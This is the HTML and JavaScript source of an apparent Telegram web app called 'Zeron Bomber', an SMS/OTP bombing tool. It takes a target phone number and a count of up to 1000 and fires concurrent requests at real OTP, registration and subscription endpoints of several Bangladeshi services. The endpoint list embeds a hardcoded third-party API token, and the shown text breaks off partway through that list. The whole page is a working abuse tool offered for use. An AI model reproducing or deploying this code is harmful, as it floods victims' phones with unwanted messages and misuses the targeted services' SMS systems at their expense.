<!DOCTYPE html>
<html lang="en" data-theme="dark">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, viewport-fit=cover">
    <title>Zeron Bomber - Starlight Advanced</title>

    <script src="https://telegram.org/js/telegram-web-app.js"></script>
  

 
<script src='//libtl.com/sdk.js' data-zone='9819201' data-sdk='show_9819201'></script>


<style>
        @import url('https://fonts.googleapis.com/css2?family=Sora:wght@400;500;600;700&display=swap');
        :root {
            --light-bg: #F9FAFB; --light-surface: #FFFFFF; --light-text: #111827; --light-text-secondary: #6B7280; --light-border: #E5E7EB; --light-primary: #3B82F6; --light-success: #22C55E; --light-error: #EF4444;
            --dark-bg: #0d1117; --dark-surface: #161b22; --dark-text: #E6EDF3; --dark-text-secondary: #8B949E; --dark-border: #30363D; --dark-primary: #58A6FF; --dark-success: #3FB950; --dark-error: #F85149;
            --deep-blue-bg: #0A192F; --deep-blue-surface: #172A45; --deep-blue-text: #CCD6F6; --deep-blue-primary: #64FFDA;
            --emerald-bg: #062821; --emerald-surface: #0A3A2A; --emerald-text: #D1FAE5; --emerald-primary: #34D399;
            --crimson-bg: #2D0000; --crimson-surface: #4D0000; --crimson-text: #FFD1D1; --crimson-primary: #F56565;
            --midnight-bg: #1A1A2E; --midnight-surface: #16213E; --midnight-text: #EAEAEA; --midnight-primary: #0F3460;
            --sunrise-bg: #121212; --sunrise-surface: #1E1E1E; --sunrise-text: #EDEDED; --sunrise-primary: #FB8C00; --sunrise-success: #4CAF50; --sunrise-error: #F44336; --sunrise-accent: #29B6F6; 
            --amethyst-bg: #2C2A4A; --amethyst-surface: #4F4C7A; --amethyst-text: #E1DEFF; --amethyst-primary: #9D99FF;
            --cyberpunk-bg: #0A0F1E; --cyberpunk-surface: #1E1B2E; --cyberpunk-text: #E0E0F8; --cyberpunk-primary: #FF2E97; --cyberpunk-success: #38F9D7; --cyberpunk-error: #FF6B00; --cyberpunk-accent: #8B5CF6; --cyberpunk-border: #FF2E97;
            --bg: var(--light-bg); --surface: var(--light-surface); --text-primary: var(--light-text); --text-secondary: var(--light-text-secondary); --border: var(--light-border); --primary: var(--light-primary); --success: var(--light-success); --error: var(--light-error);
        }
        [data-theme="dark"] { --bg: var(--dark-bg); --surface: var(--dark-surface); --text-primary: var(--dark-text); --text-secondary: var(--dark-text-secondary); --border: var(--dark-border); --primary: var(--dark-primary); --success: var(--dark-success); --error: var(--dark-error); }
        [data-theme="deep-blue"] { --bg: var(--deep-blue-bg); --surface: var(--deep-blue-surface); --text-primary: var(--deep-blue-text); --text-secondary: #8892B0; --border: #233554; --primary: var(--deep-blue-primary); --success: #64FFDA; --error: #FF6B6B; }
        [data-theme="emerald"] { --bg: var(--emerald-bg); --surface: var(--emerald-surface); --text-primary: var(--emerald-text); --text-secondary: #A7F3D0; --border: #10B981; --primary: var(--emerald-primary); --success: #A7F3D0; --error: #F87171; }
        [data-theme="crimson"] { --bg: var(--crimson-bg); --surface: var(--crimson-surface); --text-primary: var(--crimson-text); --text-secondary: #FFB3B3; --border: #9B2C2C; --primary: var(--crimson-primary); --success: #9AE6B4; --error: #FEB2B2; }
        [data-theme="midnight"]{ --bg: var(--midnight-bg); --surface: var(--midnight-surface); --text-primary: var(--midnight-text); --text-secondary: #A5B4CB; --border: #3A476A; --primary: var(--midnight-primary); --success: #53BF9D; --error: #E94560; }
        [data-theme="sunrise"] { --bg: var(--sunrise-bg, #121212); --surface: var(--sunrise-surface, #1E1E1E); --text-primary: var(--sunrise-text, #EDEDED); --text-secondary: #BDBDBD; --border: #424242; --primary: var(--sunrise-primary, #FB8C00); --success: var(--sunrise-success, #4CAF50); --error: var(--sunrise-error, #F44336); --accent: var(--sunrise-accent, #29B6F6); }
        [data-theme="amethyst"] { --bg: var(--amethyst-bg); --surface: var(--amethyst-surface); --text-primary: var(--amethyst-text); --text-secondary: #B1AFDB; --border: #7F7BBD; --primary: var(--amethyst-primary); --success: #A6FFD3; --error: #FF9B9B; }
        [data-theme="cyberpunk"] { --bg: var(--cyberpunk-bg); --surface: var(--cyberpunk-surface); --text-primary: var(--cyberpunk-text); --text-secondary: #8A8A8A; --border: var(--cyberpunk-border); --primary: var(--cyberpunk-primary); --success: var(--cyberpunk-success); --error: var(--cyberpunk-error); }
        * { box-sizing: border-box; -webkit-tap-highlight-color: transparent; }
        html { height: 100%; height: -webkit-fill-available; }
        body { background-color: var(--bg); color: var(--text-primary); font-family: 'Sora', sans-serif; display: flex; align-items: center; justify-content: center; min-height: 100vh; min-height: -webkit-fill-available; margin: 0; padding: 16px; transition: background-color 0.3s, color 0.3s; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; }
        .grid-container { display: grid; grid-template-columns: repeat(2, 1fr); grid-template-rows: auto 1fr; gap: 16px; width: 100%; max-width: 800px; margin-top: 110px; }
        .grid-item { background-color: var(--surface); border: 1px solid var(--border); border-radius: 16px; padding: 24px; opacity: 0; transform: translateY(10px); animation: stagger-in 0.5s cubic-bezier(0.25, 0.46, 0.45, 0.94) forwards; transition: background-color 0.3s, border-color 0.3s, color 0.3s; }
        #action-panel { grid-column: 1 / 2; grid-row: 1 / 3; animation-delay: 0.1s; }
        #log-panel { grid-column: 2 / 3; grid-row: 1 / 2; animation-delay: 0.2s; display: flex; flex-direction: column; }
        #config-panel { grid-column: 2 / 3; grid-row: 2 / 3; animation-delay: 0.3s; }
        .panel-header { display: flex; align-items: center; justify-content: space-between; margin-bottom: 20px; flex-shrink: 0; }
        .panel-header h2 { font-size: 1.1em; margin: 0; font-weight: 600; }
        .panel-header .icon-btn { background: none; border: none; cursor: pointer; color: var(--text-secondary); padding: 4px; display: flex; align-items: center; justify-content: center; transition: color 0.2s; }
        .panel-header .icon-btn:hover { color: var(--primary); }
        .profile-header { display: flex; align-items: center; gap: 16px; margin-bottom: 24px; }
        .profile-pic-container { position: relative; width: 64px; height: 64px; flex-shrink: 0; }
        .profile-pic { width: 100%; height: 100%; border-radius: 50%; background-size: cover; background-position: center; border: 2px solid var(--primary); background-color: var(--bg); display: flex; align-items: center; justify-content: center; font-size: 2em; font-weight: 600; color: white; box-shadow: 0 4px 12px rgba(0,0,0,0.1); opacity: 0; transform: scale(0.5); animation: pop-in-pic 0.8s cubic-bezier(0.34, 1.56, 0.64, 1) 0.5s forwards; position: relative; overflow: hidden;}
        .orbiting-element { position: absolute; top: 50%; left: 50%; width: 8px; height: 8px; margin: -4px; background: var(--primary); border-radius: 50%; box-shadow: 0 0 10px color-mix(in srgb, var(--primary) 70%, transparent); opacity: 0; display: none; }
        [data-animation="orbit"] .orbiting-element { display: block; animation: orbit-path 6s linear infinite, spawn-in 0.5s ease-out forwards; }
        .orbiting-element.orbit-1 { animation-delay: 0s, 0.2s; } .orbiting-element.orbit-2 { animation-delay: -2s, 0.3s; } .orbiting-element.orbit-3 { animation-delay: -4s, 0.4s; }
        [data-animation="glow"] .profile-pic { animation: pop-in-pic 0.8s cubic-bezier(0.34, 1.56, 0.64, 1) 0.5s forwards, glow-effect 3s linear infinite alternate; }
        [data-animation="scanner"] .profile-pic::after { content: ''; position: absolute; top: -10%; left: 0; width: 100%; height: 4px; background: linear-gradient(90deg, transparent, color-mix(in srgb, var(--primary) 80%, #fff), transparent); animation: scanner-sweep 3s ease-in-out infinite; }
        [data-animation="shimmer"] .profile-pic::after { content: ''; position: absolute; top: 0; left: -100%; width: 50%; height: 100%; background: linear-gradient(100deg, transparent, rgba(255, 255, 255, 0.4), transparent); transform: skewX(-25deg); animation: shimmer-effect 3s infinite; }
        .particle-element { position: absolute; bottom: 0; left: 50%; width: 4px; height: 4px; background-color: var(--primary); border-radius: 50%; opacity: 0; display: none; }
        [data-animation="particles"] .particle-element { display: block; animation: particle-rise 4s infinite ease-out; }
        .sonar-ping { position: absolute; top: 50%; left: 50%; width: 100%; height: 100%; border-radius: 50%; border: 2px solid color-mix(in srgb, var(--primary) 50%, transparent); transform: translate(-50%, -50%) scale(1); opacity: 0; display: none; }
        [data-animation="sonar"] .sonar-ping { display: block; animation: sonar-effect 2.5s infinite ease-out; }
        .glitch-layer { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: inherit; border-radius: 50%; display: none; }
        [data-animation="glitch"] .profile-pic { animation: pop-in-pic 0.8s cubic-bezier(0.34, 1.56, 0.64, 1) 0.5s forwards, glitch-main 5s infinite linear; }
        [data-animation="glitch"] .glitch-layer { display: block; } [data-animation="glitch"] .glitch-layer:nth-child(1) { animation: glitch-1 5s infinite linear; } [data-animation="glitch"] .glitch-layer:nth-child(2) { animation: glitch-2 5s infinite linear; }
        #action-panel-header { display: flex; align-items: center; gap: 12px; margin-bottom: 8px; } #action-panel-header h1 { margin: 0; }
        #dev-info-btn { animation: info-btn-pulse 3s infinite; }
        #user-name { font-size: 1.2em; margin: 0; font-weight: 600; } #user-username { margin: 0; color: var(--text-secondary); font-size: 0.9em; }
        .input-container { margin-bottom: 16px; }
        input[type="tel"], input[type="number"] { width: 100%; padding: 12px; background-color: var(--bg); border: 1px solid var(--border); border-radius: 8px; color: var(--text-primary); font-family: 'Sora', sans-serif; font-size: 1em; transition: 0.2s; }
        input:focus { outline: none; border-color: var(--primary); box-shadow: 0 0 0 3px color-mix(in srgb, var(--primary) 20%, transparent); }
        .btn-group { display: flex; gap: 10px; }
        .launch-button, .stop-button { width: 100%; padding: 12px; color: white; border: none; border-radius: 8px; font-size: 1em; font-weight: 600; cursor: pointer; transition: all 0.2s; display: flex; align-items: center; justify-content: center; gap: 8px; }
        .launch-button { background: var(--primary); } .stop-button { background: var(--error); display: none; }
        .launch-button:hover:not(:disabled) { transform: translateY(-2px); filter: brightness(1.1); }
        .launch-button:disabled { background-color: var(--text-secondary); cursor: not-allowed; transform: none; }
        .launch-button .spinner { display: none; width: 16px; height: 16px; border: 2px solid rgba(255,255,255,0.3); border-top-color: #fff; border-radius: 50%; animation: spin 1s linear infinite; }
        .progress-area { display: none; margin-top: 24px; } .stats-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 16px; margin-bottom: 16px; } .stat-card { background-color: var(--bg); padding: 16px; border-radius: 12px; border: 1px solid var(--border); } .stat-card .label { display: flex; align-items: center; gap: 6px; font-size: 0.8em; color: var(--text-secondary); margin-bottom: 4px; } .stat-card .value { font-size: 1.5em; font-weight: 700; } #success-value { color: var(--success); } #failure-value { color: var(--error); }
        .progress-bar { width: 100%; height: 6px; background: var(--border); border-radius: 3px; overflow: hidden; margin-bottom: 8px;} .progress-bar-fill { width: 0%; height: 100%; background: var(--primary); transition: width 0.3s; border-radius: 3px; }
        #time-remaining { font-size: 0.8em; color: var(--text-secondary); text-align: center; }
        .config-item { display: flex; flex-direction: column; align-items: flex-start; gap: 8px; margin-bottom: 20px; } .config-item .label-group { display: flex; justify-content: space-between; align-items: center; width: 100%; } .config-item label { font-size: 0.9em; font-weight: 500; }
        input[type="range"] { -webkit-appearance: none; appearance: none; width: 100%; height: 6px; background: var(--border); border-radius: 3px; outline: none; transition: background 0.2s; } input[type="range"]::-webkit-slider-thumb { -webkit-appearance: none; appearance: none; width: 16px; height: 16px; background: var(--primary); border-radius: 50%; cursor: pointer; transition: transform 0.2s; } input[type="range"]::-webkit-slider-thumb:hover { transform: scale(1.1); }
        .theme-selector { display: flex; flex-wrap: wrap; gap: 10px; }
        .theme-swatch { width: 24px; height: 24px; border-radius: 50%; cursor: pointer; border: 2px solid var(--border); transition: transform 0.2s, border-color 0.2s; }
        .theme-swatch:hover { transform: scale(1.1); } .theme-swatch.active { border-color: var(--primary); transform: scale(1.1); box-shadow: 0 0 0 3px color-mix(in srgb, var(--primary) 30%, transparent); }
        .toggle-switch { position: relative; display: inline-block; width: 44px; height: 24px; } .toggle-switch input { opacity: 0; width: 0; height: 0; } .slider { position: absolute; cursor: pointer; top: 0; left: 0; right: 0; bottom: 0; background-color: var(--border); transition: .4s; border-radius: 24px; } .slider:before { position: absolute; content: ""; height: 18px; width: 18px; left: 3px; bottom: 3px; background-color: white; transition: .4s; border-radius: 50%; } input:checked + .slider { background-color: var(--primary); } input:checked + .slider:before { transform: translateX(20px); }
        .log-console { height: 100%; background-color: var(--bg); border-radius: 8px; border: 1px solid var(--border); padding: 12px; overflow-y: auto; font-family: monospace; font-size: 0.85em; flex-grow: 1; } .log-entry { display: flex; gap: 8px; margin-bottom: 4px; animation: log-in 0.3s; } .log-entry.success .status-tag { color: var(--success); } .log-entry.error .status-tag { color: var(--error); } .log-entry.info .status-tag { color: var(--primary); }
        .radio-selector { display: flex; flex-wrap: wrap; gap: 8px; } .radio-selector input { display: none; } .radio-selector label { background-color: var(--bg); border: 1px solid var(--border); color: var(--text-secondary); padding: 6px 12px; border-radius: 8px; cursor: pointer; transition: all 0.2s; font-size: 0.9em; } .radio-selector input:checked + label { background-color: var(--primary); color: white; border-color: var(--primary); }
        #api-status-list { list-style: none; padding: 0; margin: 0; font-size: 0.9em; } #api-status-list li { display: flex; justify-content: space-between; align-items: center; padding: 6px 0; } .status-dot { width: 10px; height: 10px; border-radius: 50%; background-color: #8B949E; animation: pulse-grey 2s infinite; } .status-dot.online { background-color: var(--success); animation: none; } .status-dot.offline { background-color: var(--error); animation: none; }
        .modal-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.6); backdrop-filter: blur(5px); display: flex; align-items: center; justify-content: center; opacity: 0; visibility: hidden; transition: all 0.3s; z-index: 100; padding: 16px;}
        .modal-overlay.active { opacity: 1; visibility: visible; }
        .modal-content { background: var(--surface); border-radius: 16px; padding: 0; width: 100%; max-width: 400px; opacity: 0; transform: translateY(20px); transition: all 0.3s cubic-bezier(0.25, 0.46, 0.45, 0.94); }
        .modal-overlay.active .modal-content { opacity: 1; transform: translateY(0); }
        .modal-header { display: flex; justify-content: space-between; align-items: center; padding: 16px 24px; border-bottom: 1px solid var(--border);} .modal-header h3 { margin: 0; font-weight: 600; font-size: 1.1em; }
        .dev-info-body { padding: 24px; text-align: center; } .dev-avatar { width: 80px; height: 80px; border-radius: 50%; background: var(--primary); color: white; display: flex; align-items: center; justify-content: center; font-size: 2em; font-weight: 600; margin: 0 auto 16px; border: 4px solid var(--surface); box-shadow: 0 0 0 2px var(--primary); } .dev-info-body h4 { margin: 0 0 8px; font-size: 1.2em; font-weight: 600; } .dev-info-body p { margin: 0 0 24px; color: var(--text-secondary); line-height: 1.6; }
        .modal-footer { padding: 16px 24px; background: var(--bg); border-bottom-left-radius: 16px; border-bottom-right-radius: 16px; } .dev-links { display: flex; gap: 16px; justify-content: center; } .dev-links a { color: var(--text-secondary); text-decoration: none; display: flex; align-items: center; gap: 8px; font-weight: 500; transition: color 0.2s; } .dev-links a:hover { color: var(--primary); }
        @media (max-width: 768px) { .grid-container { grid-template-columns: 1fr; } #action-panel, #config-panel, #log-panel { grid-column: 1 / 2; grid-row: auto; } .log-console { height: 200px; } }
        @keyframes stagger-in{to{opacity: 1;transform: translateY(0)}} @keyframes spin{to{transform: rotate(360deg)}} @keyframes log-in{from{opacity:0;transform:translateY(5px)}to{opacity:1;transform:translateY(0)}} @keyframes pop-in-pic{to{opacity:1;transform:scale(1)}} @keyframes orbit-path{from{transform:rotate(0deg) translateX(40px) rotate(0deg)}to{transform:rotate(360deg) translateX(40px) rotate(-360deg)}} @keyframes spawn-in{from{opacity:0;transform:scale(0)}to{opacity:.9;transform:scale(1)}}
        @keyframes glow-effect{from{box-shadow:0 0 5px color-mix(in srgb,var(--primary) 20%,transparent),0 0 10px color-mix(in srgb,var(--primary) 20%,transparent)}to{box-shadow:0 0 20px color-mix(in srgb,var(--primary) 70%,transparent),0 0 30px color-mix(in srgb,var(--primary) 50%,transparent)}}
        @keyframes scanner-sweep{0%{top:-10%}50%{top:110%}100%{top:110%}} @keyframes shimmer-effect{0%{left:-100%}100%{left:150%}} @keyframes pulse-grey{0%{opacity:1}50%{opacity:.4}100%{opacity:1}} @keyframes particle-rise{from{transform:translate(-50%,0);opacity:1}to{transform:translate(-50%,-80px);opacity:0}}
        @keyframes sonar-effect{from{transform:translate(-50%,-50%) scale(.8);opacity:1}to{transform:translate(-50%,-50%) scale(2);opacity:0}}
        @keyframes glitch-main{0%{clip-path:inset(10% 0 89% 0)}2%{clip-path:inset(54% 0 1% 0)}4%{clip-path:inset(33% 0 14% 0)}6%{clip-path:inset(93% 0 3% 0)}8%{clip-path:inset(45% 0 23% 0)}10%,100%{clip-path:inset(0)}}
        @keyframes glitch-1{0%{transform:translateX(0)}10%{transform:translateX(-5px)}10.1%{transform:translateX(5px)}20%,100%{transform:translateX(0)}}
        @keyframes glitch-2{0%{transform:translateX(0)}50%{transform:translateX(5px)}50.1%{transform:translateX(-5px)}60%,100%{transform:translateX(0)}}
        @keyframes info-btn-pulse{0%,100%{transform:scale(1);opacity:.8}50%{transform:scale(1.1);opacity:1}}
    </style>
<link rel="me" href="https://www.blogger.com/profile/15370197974318749549" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>
    <div class="grid-container">
        <div class="grid-item" id="action-panel">
            <div class="profile-header">
                <div class="profile-pic-container" id="profile-pic-container" data-animation="orbit">
                    <div class="profile-pic" id="profile-pic">
                        <div class="glitch-layer"></div><div class="glitch-layer"></div>
                    </div>
                    <div class="orbiting-element orbit-1"></div> <div class="orbiting-element orbit-2"></div> <div class="orbiting-element orbit-3"></div>
                    <div class="particle-element"></div><div class="particle-element"></div><div class="particle-element"></div><div class="particle-element"></div><div class="particle-element"></div>
                    <div class="sonar-ping"></div>
                </div>
                <div>
                    <h2 id="user-name">Welcome</h2>
                    <p id="user-username">Loading...</p>
                </div>
            </div>
            <div id="action-panel-header">
                <h1>Zeron Bomber</h1>
               

<button 
    id="dev-info-btn" 
    title="About DevZeron"
    style="
        background: linear-gradient(135deg, #6a11cb, #2575fc);
        border: none;
        border-radius: 50%;
        width: 40px;
        height: 40px;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
        color: #fff;
        transition: all 0.2s ease;
        box-shadow: 0 2px 6px rgba(0, 0, 0, 0.2);
    "
    onmouseover="this.style.transform='scale(1.2)'; this.style.boxShadow='0 4px 12px rgba(78,84,200,0.6)'; this.style.background='linear-gradient(135deg, #2575fc, #6a11cb)'"
    onmouseout="this.style.transform='scale(1)'; this.style.boxShadow='0 2px 6px rgba(0,0,0,0.2)'; this.style.background='linear-gradient(135deg, #6a11cb, #2575fc)'"
    onmousedown="this.style.transform='scale(0.95)'"
    onmouseup="this.style.transform='scale(1.2)'"
>
    <svg xmlns="http://www.w3.org/2000/svg" 
         width="18" height="18" 
         viewBox="0 0 24 24" 
         fill="none" stroke="white" 
         stroke-width="2" 
         stroke-linecap="round" 
         stroke-linejoin="round">
        <path d="M12 12a5 5 0 0 0 5 -5a5 5 0 0 0 -5 -5a5 5 0 0 0 -5 5a5 5 0 0 0 5 5zm0 7a5 5 0 0 0 5 5a5 5 0 0 0 -5 5a5 5 0 0 0 -5 -5a5 5 0 0 0 5 -5z"/>
    </svg>
</button>


            </div>
            <p class="tagline">Advanced bombing utility. Please use responsibly.</p>
            <div class="input-container"><input type="tel" id="number" placeholder="Target Number (e.g., 01xxxxxxxxx)"></div>
            <div class="input-container"><input type="number" id="amount" placeholder="Amount (Max 1000)"></div>
            <div class="btn-group">
                <button class="launch-button" id="startBtn">
                    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M13 2L3 14h9l-1 8 10-12h-9l1-8z"></path></svg>
                    <span id="btn-text">Launch</span>
                    <div class="spinner"></div>
                </button>
                <button class="stop-button" id="stopBtn">
                    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="3" y="3" width="18" height="18" rx="2" ry="2"></rect></svg>
                </button>
            </div>
            <div class="progress-area" id="progress-area">
                <div class="stats-grid">
                    <div class="stat-card"> <div class="label">Success</div> <div class="value" id="success-value">0</div> </div>
                    <div class="stat-card"> <div class="label">Failure</div> <div class="value" id="failure-value">0</div> </div>
                </div>
                <div class="progress-bar"><div class="progress-bar-fill" id="progress-bar-fill"></div></div>
                <div id="time-remaining"></div>
            </div>
        </div>

        <div class="grid-item" id="log-panel">
            <div class="panel-header">
                <h2>Live Console</h2>
                <div>
                    <button class="icon-btn" id="clear-log-btn" title="Clear Log">
                        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 4H8l-7 8 7 8h13a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2z"></path><line x1="18" y1="9" x2="12" y2="15"></line><line x1="12" y1="9" x2="18" y2="15"></line></svg>
                    </button>
                    <button class="icon-btn" id="export-log-btn" title="Export Log">
                       <svg class="icon" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line></svg>
                    </button>
                </div>
            </div>
            <div class="log-console" id="log-console"></div>
        </div>

        <div class="grid-item" id="config-panel">
            <div class="panel-header"><h2>Configuration</h2></div>
            <div class="config-item">
                <label>Theme</label>
                <div class="theme-selector" id="theme-selector"></div>
            </div>
            <div class="config-item">
                <label>Profile Animation</label>
                <div class="radio-selector" id="profile-animation-selector">
                    <input type="radio" id="anim-orbit" name="profile_animation" value="orbit" checked><label for="anim-orbit">Orbit</label>
                    <input type="radio" id="anim-glow" name="profile_animation" value="glow"><label for="anim-glow">Glow</label>
                    <input type="radio" id="anim-scanner" name="profile_animation" value="scanner"><label for="anim-scanner">Scanner</label>
                    <input type="radio" id="anim-shimmer" name="profile_animation" value="shimmer"><label for="anim-shimmer">Shimmer</label>
                    <input type="radio" id="anim-particles" name="profile_animation" value="particles"><label for="anim-particles">Particles</label>
                    <input type="radio" id="anim-sonar" name="profile_animation" value="sonar"><label for="anim-sonar">Sonar</label>
                    <input type="radio" id="anim-glitch" name="profile_animation" value="glitch"><label for="anim-glitch">Glitch</label>
                </div>
            </div>
            <div class="config-item">
                <div class="label-group"><label for="concurrency">Concurrency</label><span id="concurrency-value">10</span></div>
                <input type="range" id="concurrency" min="1" max="20" value="10">
            </div>
            <div class="config-item">
                <div class="label-group"><label for="delay">Delay (ms)</label><span id="delay-value">0</span></div>
                <input type="range" id="delay" min="0" max="5000" value="0" step="100">
            </div>
            <div class="config-item">
                <div class="label-group"> <label for="haptic-toggle">Haptic Feedback</label> <label class="toggle-switch"> <input type="checkbox" id="haptic-toggle"> <span class="slider"></span> </label> </div>
            </div>
            <div class="config-item">
                <div class="panel-header" style="margin-bottom: 10px;">
                    <h2 style="font-size: 0.9em; font-weight: 500;">API Status</h2>
                    <button class="icon-btn" id="recheck-api-btn" title="Re-check Status">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="23 4 23 10 17 10"></polyline><path d="M20.49 15a9 9 0 1 1-2.12-9.36L23 10"></path></svg>
                    </button>
                </div>
                <ul id="api-status-list"></ul>
            </div>
        </div>
    </div>
    
    <div class="modal-overlay" id="dev-info-modal">
        <div class="modal-content">
            <div class="modal-header">
                <h3>About DevZeron </h3>
                <button class="icon-btn" id="close-modal-btn">
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round"><line x1="18" y1="6" x2="6" y2="18"></line><line x1="6" y1="6" x2="18" y2="18"></line></svg>
                </button>
            </div>
            <div class="dev-info-body">
                <div class="dev-avatar">DZ</div>
                <h4>DevZeron</h4>
                <p>Full-stack developer with a passion for creating clean, efficient, and user-friendly web applications.</p>
            </div>
            <div class="modal-footer">
                <div class="dev-links">
                    <a href="https://t.me/DevZeron" target="_blank">
                        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M22 2L11 13H2l9-9-9 9v10l20-8-8-2 8-10z"></path></svg>
                        <span>Telegram</span>
                    </a>
                    <a href="https://github.com/DevZeronx" target="_blank">
                        <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path></svg>
                        <span>GitHub</span>
                    </a>
                </div>
            </div>
        </div>
    </div>

<script>
    const App = {
        config: { concurrency: 10, theme: 'dark', delay: 0, profileAnimation: 'orbit', hapticFeedback: false },
        state: { isRunning: false, success: 0, failure: 0, sent: 0, total: 0, startTime: 0, isStopping: false, user: {}, targetNumber: '' },
        ui: {},
        themes: [ { id: 'dark', color: '#58A6FF' }, { id: 'light', color: '#3B82F6' }, { id: 'deep-blue', color: '#64FFDA' }, { id: 'emerald', color: '#34D399' }, { id: 'crimson', color: '#F56565' }, { id: 'midnight', color: '#0F3460' }, { id: 'sunrise', color: '#FB8C00' }, { id: 'amethyst', color: '#9D99FF' }, { id: 'cyberpunk', color: '#FF2E97' }, ],
        apiFunctions: [
            { 
                name: 'Zeron DA-API 1', 
                func: (phone, i) => App.util.sendRequest(
                    "https://da-api.robi.com.bd/da-nll/otp/send",
                    {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({ msisdn: phone }),
                    },
                    i
                )
            },



{ name: 'Zeron DA-API 2', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 3', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 4', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  // Other APIs
  { name: 'Zeron DA-API 5', func: 
    (phone, i) => App.util.sendRequest(
      'https://cihno.aibl.com.bd/cihno-service/api/v1/public/user/send/otp',
      {
        method: 'POST',
        headers: { 
          'Content-Type': 'application/json',
          'authorization': 'Otp bnVsbA==' 
        },
        body: JSON.stringify({ 
          countryId: "19", 
          mobileNumber: phone, 
          purpose: "registration" 
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 6', func: 
    (phone, i) => App.util.sendRequest(
      "https://user-api.jslglobal.co:444/v1/send-otp",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
        body: new URLSearchParams({
          phone: `+88${phone}`,
          jatri_token: "J9vuqzxHyaWa3VaT66NsvmQdmUmwwrHj"
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 7', func: 
    (phone, i) => App.util.sendRequest(
      'https://api.toybox.live/bdapps_handler.php',
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          "Operation": "CreateSubscription",
          "MobileNumber": "88" + phone,
          "PackageID": 100
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 8', func: 
    (phone, i) => App.util.sendRequest(
      'https://applink.com.bd/appstore-v4-server/login/otp/request',
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ "msisdn": "88" + phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 9', func: 
    (phone, i) => App.util.sendRequest(
      "https://training.gov.bd/backoffice/api/user/sendOtp",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ mobile: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 10', func: 
    (phone, i) => App.util.sendRequest(
      "https://core.easy.com.bd/api/v1/registration",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          "name": "A",
          "mobile": phone,
          "password": "a",
          "password_confirmation": "a"
        }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 11', func: 
    (phone, i) => App.util.sendRequest(
      `https://app.hishabee.business/api/V2/otp/send?mobile_number=${phone}`,
      { method: 'POST' },
      i
    )
  },

  { name: 'Zeron DA-API 12', func: 
    (phone, i) => App.util.sendRequest(
      "https://da-api.robi.com.bd/da-nll/otp/send",
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ msisdn: phone }),
      },
      i
    )
  },

  { name: 'Zeron DA-API 13', func: 
    (phone, i) => App.util.sendRequest(
      'https://api.apex4u.com/api/auth/login',
      {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ "phoneNumber": phone }),
      },
      i
    )
